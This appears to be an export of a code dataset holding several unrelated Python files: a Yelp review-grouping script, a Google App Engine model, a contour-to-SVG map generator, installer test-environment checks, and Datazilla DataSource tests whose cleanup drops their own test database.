| 2020-04-06T06:38:43.330793 | 2014-04-29T20:56:48 | 2014-04-29T20:56:48 | 19,287,351 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import io,json,string
spamStores = ["koCfyexzjjF3pZrzijlL3g","hAq4y3FK6tRbjfjvfXAaww","ZZlMGUiKZNiDyPLmra7RZQ","frZdH7hTGIs7nykH4jeIPA","Tg0D45xHJBN0jOMq_v04XA","x0NOgX6P4x-82cC0kcO1hg","0yBs5wbVw9gTIDe9Z-rMTg","jHte0SjUldZeDDZ5py0ZhA","d87fxJ47AzTlREZCnUmaFA","oMycF1cQgR1UVkafXfof7A","IkSF5GEHcl7DePGlXksl5A","pSiR8m18iick2D7TFdmb-Q","fmuj7u1gflmEjW-h0v9bwg","SPBZxmt8_nT30rNVnKHYKA","0vzZ_Bcb02rJljeMU9XkBw","UedVu1tCV_Q3twZZtwtl8Q","vA8T8QXh78iSXhxShLNgQA","SkcccvAydbt5zlQI0EUL2g","zp713qNhx8d9KCJJnrw1xA","cc9KFNrcY9gA7t9D1a3FpA"]
userNameId = {}
with open("yelp_academic_dataset_user.json", "r") as file:
for line in file:
line = line[:-1]
name = json.loads(line)["name"]
userId = json.loads(line)["user_id"]
userNameId.update({userId:name})
#print userNameId
reviewDic = {}
allStores = ""
with open("restaurant_grouped_ranked_reviews.json", "r") as file:
for line in file:
line = line[:-1]
l = json.loads(line)
business_id = l["business_id"]
count = 0
if business_id in spamStores:
if business_id not in reviewDic.keys():
revs = []
#print json.dumps(json.loads(line)["text"].encode('utf-8'))
revs.append('{"userName":"'+userNameId[l["user_id"]]+'","review":'+json.dumps(l["text"].encode('utf-8'))+"}")
elif business_id in reviewDic.keys():
revs.append('{"userName":"'+userNameId[l["user_id"]]+'","review":'+json.dumps(l["text"].encode('utf-8'))+"}")
reviewDic.update({l["business_id"]:revs})
#print count,revs
#print reviewDic["VZYMInkjRJVHwXVFqeoMWg"]
# for key in reviewDic.keys():
# print reviewDic[key]
# #print key
# reviews = ""
# for value in range(len(reviewDic[key])):
# #print value
# reviews = reviews+","+reviewDic[key][value]
#print reviews
#allStores = '"'+key+'":'+reviewDic[key]+","+allStores
#print allStores
#print allStores
with open("r.js","w+") as wFile:
wFile.write("var REVIEWS = {")
for key in reviewDic.keys():
wFile.write('"'+key+'":')
wFile.write('[')
for value in range(len(reviewDic[key])):
#wFile.write(string.replace(reviewDic[key][value],'"',"'").encode('utf-8'))
#print json.dumps(reviewDic[key][value])
#print reviewDic[key][value]
# wFile.write('{')
# wFile.write(reviewDic[key][value])
# wFile.write(':')
wFile.write(reviewDic[key][value])
wFile.write(',')
wFile.write('],')
# wFile.write('","'.join(reviewDic[key]).encode('utf-8'))
# wFile.write(",")
wFile.write("}")
|
UTF-8
|
Python
| false | false | 2,014 |
10,642,928,980,857 |
a26fb9729c8ed7bae79c4aab42f90ecd45a564f8
|
a5fa6cb3b4f0fab4d8f281a290ac0c46a3032a5d
|
/www/member.py
|
9495b47a1aeb00a3068ffa533b1f437c0cd0416a
|
[] |
no_license
|
borisnieuwenhuis/restify
|
https://github.com/borisnieuwenhuis/restify
|
4295bec66041bf6749d6ad98bfe4ba65c5831404
|
20ed26663b959231e0f4e066b999a2a0e443ad71
|
refs/heads/master
| 2021-01-13T02:03:12.062699 | 2012-04-27T15:17:02 | 2012-04-27T15:17:02 | 3,143,767 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from google.appengine.ext import db
class Member(db.Model):
name = db.StringProperty(required = True)
lastname = db.StringProperty(required = False)
|
UTF-8
|
Python
| false | false | 2,012 |
11,175,504,935,117 |
10d815ecb5fe1d0ed514ad654ea7ed96223fab87
|
b0c5e117d230a2aacf65ce3397b9d013da4ab4fa
|
/fursten/src/fursten/diagram/contour.py
|
1bd4376729419af75e6c3953ff135b19ff3ccb7f
|
[] |
no_license
|
lunkan/Fursten
|
https://github.com/lunkan/Fursten
|
8647a79eeb590cceb9e822f5c435c12c78513731
|
63b70a9f45f70b3bf1dc2514ed2161c52e6b1637
|
refs/heads/master
| 2020-05-18T20:19:50.305457 | 2013-12-27T13:11:09 | 2013-12-27T13:11:09 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding:utf-8 -*-
"""
Created on 22 sep 2012
@author: Olof Manbo
Version: 1.0.0
"""
import time
import logging
import createPath
LT = {((0,0),
(1,0)):
[[0.0 ,0.5],
[0.5 ,1.0]],
((0,0),
(0,1)):
[[0.5 ,1.0],
[1.0 ,0.5]],
((0,0),
(1,1)):
[[0.0 ,0.5],
[1.0 ,0.5]],
((0,1),
(0,0)):
[[1.0 ,0.5],
[0.5 ,0.0],
],
((0,1),
(0,1)):
[[0.5 ,1.0],
[0.5 ,0.0]],
((0,1),
(1,1)):
[[0.0 ,0.5],
[0.5 ,0.0]],
((1,0),
(0,0)):
[[0.5 ,0.0],
[0.0 ,0.5]],
((1,0),
(1,0)):
[[0.5 ,0.0],
[0.5 ,1.0]],
((1,0),
(1,1)):
[[0.5 ,0.0],
[1.0 ,0.5]],
((1,1),
(0,0)):
[[1.0 ,0.5],
[0.0 ,0.5]],
((1,1),
(1,0)):
[[1.0 ,.5],
[0.5 ,1.0]],
((1,1),
(0,1)):
[[0.5 ,1.0],
[0.0 ,0.5]],
}
LT_2 = {((0,1),
(1,0)):
[[[0.0 ,0.5],
[0.5 ,0.0]],
[[1.0 ,0.5],
[0.5 ,1.0]]],
((1,0),
(0,1)):
[[[0.5 ,0.0],
[1.0 ,0.5]],
[[0.5 ,1.0],
[0.0 ,0.5]]],
}
logger = logging.getLogger('console')
def contour_newer(data, X, Y, number_of_types):
lines = [[] for dummy in xrange(number_of_types + 1)]
for y_l in Y[:-1]:
for x_l in X[:-1]:
y = y_l - Y[0]
x = x_l - X[0]
for colornumber in xrange(1,number_of_types + 1):
T = ((int(data[x][y] == colornumber), int(data[x+1][y]) == colornumber),
(int(data[x][y+1] == colornumber), int(data[x+1][y+1] == colornumber)))
if LT.has_key(T):
lines[colornumber].append([[x_l + LT[T][0][0], y_l + LT[T][0][1]],
[x_l + LT[T][1][0], y_l + LT[T][1][1]]])
elif LT_2.has_key(T):
lines[colornumber].append([[x_l + LT_2[T][0][0][0], y_l + LT_2[T][0][0][1]],
[x_l + LT_2[T][0][1][0], y_l + LT_2[T][0][1][1]]])
lines[colornumber].append([[x_l + LT_2[T][1][0][0], y_l + LT_2[T][1][0][1]],
[x_l + LT_2[T][1][1][0], y_l + LT_2[T][1][1][1]]])
return lines[1:]
def lineify(lines):
retval = []
retX = [lines[0][0][0], lines[0][1][0]]
retY = [lines[0][0][1], lines[0][1][1]]
current_line = lines[0]
lines.remove(current_line)
while (current_line is not None):
line_found = False
for l in lines:
if (current_line[1] == l[0]):
retX += [l[0][0], l[1][0]]
retY += [l[0][1], l[1][1]]
current_line = l
line_found = True
break
if line_found:
lines.remove(current_line)
elif not lines == []:
retval.append([retX, retY])
retX = [lines[0][0][0], lines[0][1][0]]
retY = [lines[0][0][1], lines[0][1][1]]
current_line = lines[0]
lines.remove(current_line)
else:
retval.append([retX, retY])
current_line = None
return retval
def getSvg(scale, nodes, node_names, X, Y):
paths, real_data = getPaths(scale, nodes, node_names, X, Y)
retval = ""
for d in paths:
retval += createPath.path(d[0], "node_%s\n"%d[1])
return retval, real_data
def getPaths(scale, nodes_dict, colors_for_map, world_width, world_height):
X = range(-world_width/scale/2, world_width/scale/2)
Y = range(-world_height/scale/2, world_height/scale/2)
node_names = nodes_dict.keys()
nodes = []
for node_name in node_names:
nodes.append(nodes_dict[node_name])
scale = float(scale)
t0 = time.time()
R = 1000/scale
R_2 = R*R
N = 10
split_x = [(-world_width/2 + world_width/N*n)/scale for n in xrange(0, N + 2)]
split_y = [(-world_height/2 + world_height/N*n)/scale for n in xrange(0, N + 2)]
real_data = []
boxes = [ [ [[] for dummy in split_y[:-1]] for dummy in split_x[:-1]] for dummy in nodes]
for box_n, node_list in enumerate(nodes):
for node in node_list:
for n in xrange(len(split_x) - 1):
if split_x[n] < node[0]/scale <= split_x[n + 1]:
box_x = n
for n in xrange(len(split_y) - 1):
if split_y[n] < node[1]/scale <= split_y[n + 1]:
box_y = n
boxes[box_n][box_x][box_y].append([node[0]/scale, node[1]/scale])
for x in X:
real_data.append([])
for y in Y:
if x == X[0] or x == X[-1] or y == Y[0] or y == Y[-1]:
real_data[-1].append(0)
else:
min_distance = R_2
colornumber = 0
for box_n, box_list in enumerate(boxes):
box_x_s = []
box_y_s = []
for n in xrange(len(split_x) - 1):
if (split_x[n] - R) < x <= (split_x[n + 1] + R):
box_x_s.append(n)
for n in xrange(len(split_y) - 1):
if (split_y[n] - R) < y <= (split_y[n + 1] + R):
box_y_s.append(n)
node_list = []
for box_x in box_x_s:
for box_y in box_y_s:
node_list += box_list[box_x][box_y]
for node in node_list:
delta_x = x - node[0]
delta_y = y - node[1]
distance = (delta_x*delta_x + delta_y*delta_y)
if distance < min_distance:
min_distance = distance
colornumber = box_n + 1
real_data[-1].append(colornumber)
logger.info("getSvg()::before contour time:%f"%(time.time() - t0))
lines = contour_newer(real_data, X, Y, len(node_names))
retval = ''
paths = []
for line_list, node_name in zip(lines, node_names):
if line_list != []:
full_lines = lineify(line_list)
d = ""
for line in full_lines:
x = []
y = []
NX = len(line[0])
NY = len(line[1])
for nx in range(NX):
nx_0 = (nx - 4)%NX
nx_1 = (nx + 2)%NX
nx_3 = (nx - 2)%NX
nx_4 = (nx + 4)%NX
x.append((line[0][nx_0] + line[0][nx_1] + line[0][nx] + line[0][nx_3] + line[0][nx_4])*scale/5)
for ny in range(NY):
ny_0 = (ny - 4)%NY
ny_1 = (ny + 2)%NY
ny_3 = (ny - 2)%NY
ny_4 = (ny + 4)%NY
y.append((line[1][ny_0] + line[1][ny_1] + line[1][ny] + line[1][ny_3] + line[1][ny_4])*scale/5)
d += createPath.d(x,y)
paths.append([d, node_name, colors_for_map[node_name]])
return paths, real_data
|
UTF-8
|
Python
| false | false | 2,013 |
7,610,682,051,757 |
0d7f78df907491ffbb8e12e6b53443481117c4eb
|
169f491c1584d7b37640fd33302e0f666bb50e24
|
/test/textui_test/sessions_test/test_testenv.py
|
c4be3940a8d73e87a6284da8686851e061eb4b59
|
[
"GPL-2.0-only",
"GPL-1.0-or-later",
"LicenseRef-scancode-other-copyleft"
] |
non_permissive
|
vmware/weasel
|
https://github.com/vmware/weasel
|
0ea79ae56ecff9ae0ed5529399cbb5631a70df0e
|
ff9c06b4c77b06067b40c5a0f342e2b15dc99601
|
refs/heads/master
| 2016-09-06T12:59:45.045784 | 2013-03-07T04:53:19 | 2013-03-07T04:53:19 | 6,079,420 | 17 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/env python
#-*- coding: utf-8 -*-
'''Sanity tests to confirm that the test environment is being built up.
'''
def test_noop():
assert True
def test_faux():
import fauxroot
assert fauxroot.FAUXROOT == None
import fauxTextuiIO
assert len(fauxTextuiIO.fauxStdin) >= 0
def test_goodconfig1():
import fauxconfig
assert fauxconfig.vmkctl
assert fauxconfig.parted
# vim: set sw=4 tw=80 :
|
UTF-8
|
Python
| false | false | 2,013 |
4,818,953,325,371 |
5d71051c533da1408ad7d120f74b11962050f92b
|
34ed622445d76667a0a57e5343face153cc68399
|
/tests/model/sql/test_models.py
|
278c2c78dcb11b35a648c9b812fd1baaef3743b0
|
[
"MPL-2.0"
] |
non_permissive
|
mozilla/datazilla
|
https://github.com/mozilla/datazilla
|
7211a1f8275fc6bbdc42f9cb3dcdebe4d101baf7
|
9f5b2bf779ca8b179501c6e283695778cb59febe
|
refs/heads/master
| 2023-09-02T20:43:51.966533 | 2014-10-23T17:00:02 | 2014-10-23T17:00:02 | 4,148,916 | 3 | 3 | null | false | 2014-10-23T17:00:02 | 2012-04-26T15:10:56 | 2014-08-29T16:19:20 | 2014-10-23T17:00:02 | 16,186 | 42 | 15 | 0 |
JavaScript
| null | null |
import datetime
from contextlib import contextmanager
dataset_num = 1
def create_datasource(model, **kwargs):
"""Utility function to easily create a test DataSource."""
global dataset_num
defaults = {
"project": "foo",
"dataset": dataset_num,
"contenttype": "perftest",
"host": "localhost",
"type": "MySQL-InnoDB",
"creation_date": datetime.datetime.now(),
"cron_batch": "small",
}
dataset_num += 1
defaults.update(kwargs)
if "name" not in defaults:
defaults["name"] = "_".join(
[
defaults["project"],
defaults["contenttype"],
str(defaults["dataset"]),
]
)
return model.objects.create(**defaults)
@contextmanager
def assert_num_queries(queries):
from django.db import connection
_old_debug_cursor = connection.use_debug_cursor
connection.use_debug_cursor = True
start_queries = len(connection.queries)
try:
yield
total = len(connection.queries) - start_queries
msg = "Expected {0} queries, executed {1}".format(queries, total)
assert total == queries, msg
finally:
connection.use_debug_cursor = _old_debug_cursor
def pytest_funcarg__DataSource(request):
"""
Gives a test access to the DataSource model class.
"""
from datazilla.model.sql.models import DataSource
return DataSource
def test_datasources_cached(DataSource):
"""Requesting the full list of DataSources twice only hits the DB once."""
create_datasource(DataSource)
DataSource.objects.cached()
with assert_num_queries(0):
DataSource.objects.cached()
def test_datasource_cache_invalidated(DataSource):
"""Saving a new datasource invalidates the datasource cache."""
# prime the cache
initial = DataSource.objects.cached()
# create a new datasource
create_datasource(DataSource)
# new datasource appears in the list immediately
assert len(DataSource.objects.cached()) == len(initial) + 1
def test_create_next_dataset(ptm, DataSource):
"""Creating the next dataset keeps all the important fields."""
sds = ptm.sources["perftest"]
sds2 = sds.create_next_dataset()
act = DataSource.objects.filter(dataset=2).values()[0]
#remove fields we don't want to compare
del(act["creation_date"])
del(act["id"])
del(act["host"])
del(act["type"])
exp = {'contenttype': u'perftest',
'cron_batch': "small",
'dataset': 2L,
'name': u'{0}_perftest_2'.format(ptm.project),
'read_only_host': None,
'oauth_consumer_key': None,
'oauth_consumer_secret': None,
'project': unicode(ptm.project),
}
# special cleanup
# drop the new database we created
from django.conf import settings
import MySQLdb
conn = MySQLdb.connect(
host=sds2.datasource.host,
user=settings.DATAZILLA_DATABASE_USER,
passwd=settings.DATAZILLA_DATABASE_PASSWORD,
)
cur = conn.cursor()
cur.execute("DROP DATABASE {0}".format(sds2.datasource.name))
conn.close()
assert act == exp
|
UTF-8
|
Python
| false | false | 2,014 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.